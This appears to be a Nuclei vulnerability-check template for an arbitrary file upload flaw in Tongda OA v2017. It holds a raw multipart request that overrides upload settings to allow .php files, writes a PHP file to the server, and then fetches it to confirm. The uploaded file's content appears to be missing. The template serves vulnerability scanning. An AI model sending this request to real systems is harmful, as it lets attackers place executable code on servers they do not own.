id: tongda-action-uploadfile info: name: Tongda OA v2017 action_upload - Arbitrary File Upload author: SleepingBag945 severity: critical description: | Tongda OA v2017 action_upload.php file filtering is insufficient and does not require background permissions, resulting in arbitrary file upload vulnerabilities reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v2017%20action_upload.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md - https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml metadata: verified: true max-request: 2 fofa-query: app="TDXK-通达OA" tags: tongda,fileupload,intrusive,router variables: string: "tongda-action-uploadfile" http: - raw: - | POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[fileFieldName]" ffff ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[fileMaxSize]" 1000000000 ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[filePathFormat]" {{randstr}} ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[fileAllowFiles][]" .php ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="ffff"; filename="test.php" Content-Type: application/octet-stream ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="mufile" submit ------WebKitFormBoundaryjhddzlqp-- - | GET {{randstr}}.php HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body_2 words: - '{{md5(string)}}' - type: status status: - 200 # digest: 490a00463044022042e581b6843ee7348560b8fe21246c3b7751969e2afa7f1fd73c390020032c1e0220789abf641572fc5db8ec7d2db073b66ccdf3122620c04fa572349b59257e5fe0:922c64590222798bb761d5b6d8e72950